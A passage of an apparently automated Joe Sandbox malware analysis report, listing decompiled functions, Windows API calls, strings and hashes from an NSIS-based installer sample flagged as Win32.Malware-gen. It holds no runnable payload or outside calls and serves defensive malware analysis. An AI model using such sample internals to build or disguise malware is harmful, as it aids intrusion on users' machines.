                                                                                                                        • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: F
                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                        • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                        • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                                                        • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                        • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                                                        Function 00406167 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                                                        • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                                                          • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                          • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                        • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                                                        • wsprintfA.USER32 ref: 004061E6
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                                                          • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00406015
                                                                                                                          • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                        • String ID: %ls=%ls$[Rename]
                                                                                                                        • API String ID: 2171350718-461813615
                                                                                                                        • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                        • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                                                                                        • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                        • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                                                                                        Function 004067CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                        • CharPrevW.USER32(?,?,76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                        Strings
                                                                                                                        • *?|<>/":, xrefs: 00406821
                                                                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe", xrefs: 00406813
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-418869352
                                                                                                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                        • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                        • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                                                        Function 00404507 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                                                        • GetSysColor.USER32(00000000), ref: 00404562
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                                                        • GetSysColor.USER32(?), ref: 0040458D
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                                                        • DeleteObject.GDI32(?), ref: 004045B7
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                        • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                        • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                                                        Function 00404E5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                                                        • GetMessagePos.USER32 ref: 00404E7E
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                        • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                        • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                                                        Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                                                                        • MulDiv.KERNEL32(000887A9,00000064,000889AD), ref: 00402FE1
                                                                                                                        • wsprintfW.USER32 ref: 00402FF1
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                        Strings
                                                                                                                        • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                        • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                        • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                                                        • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                        • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                                                        Function 70592655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 705912BB: GlobalAlloc.KERNELBASE(00000040,?,705912DB,?,7059137F,00000019,705911CA,-000000A0), ref: 705912C5
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70592743
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70592778
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1780285237-0
                                                                                                                        • Opcode ID: 049f182124680b1f3877ddcd22d0b8b3bb2a6859428313954af268b9dac07ecb
                                                                                                                        • Instruction ID: 9c6fbfd08319bd47a1d63d053adc819dc958cb5ec642fff5549fdad71207e83b
                                                                                                                        • Opcode Fuzzy Hash: 049f182124680b1f3877ddcd22d0b8b3bb2a6859428313954af268b9dac07ecb
                                                                                                                        • Instruction Fuzzy Hash: 0C31D032124101DFC7169FA6CD88D2E7FBAFB95300326492EF202A7620D7716C14DF69
                                                                                                                        Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2667972263-0
                                                                                                                        • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                        • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                                                        • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                        • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                                                        Function 00405EF8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405EA9
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405F51
                                                                                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: 44v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nst8185.tmp
                                                                                                                        • API String ID: 3248276644-2284398316
                                                                                                                        • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                        • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                                                        • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                        • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                                                        Function 70592480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 705925C2
                                                                                                                          • Part of subcall function 705912CC: lstrcpynW.KERNEL32(00000000,?,7059137F,00000019,705911CA,-000000A0), ref: 705912DC
                                                                                                                        • GlobalAlloc.KERNEL32(00000040), ref: 70592548
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70592563
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4216380887-0
                                                                                                                        • Opcode ID: 175ef076d529efe6615dfc1a961e97b83449e2521c9378dd24bba7b52997c924
                                                                                                                        • Instruction ID: 52f0c666f4150ed2acc0f29f8a4cc0121f39b82a369ce2b428542cb4980d8b6e
                                                                                                                        • Opcode Fuzzy Hash: 175ef076d529efe6615dfc1a961e97b83449e2521c9378dd24bba7b52997c924
                                                                                                                        • Instruction Fuzzy Hash: CC41E2B1028305DFDB14EF25D848A2E7FBCFB94310F22491EF54ACA240E770A944DBA9
                                                                                                                        Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
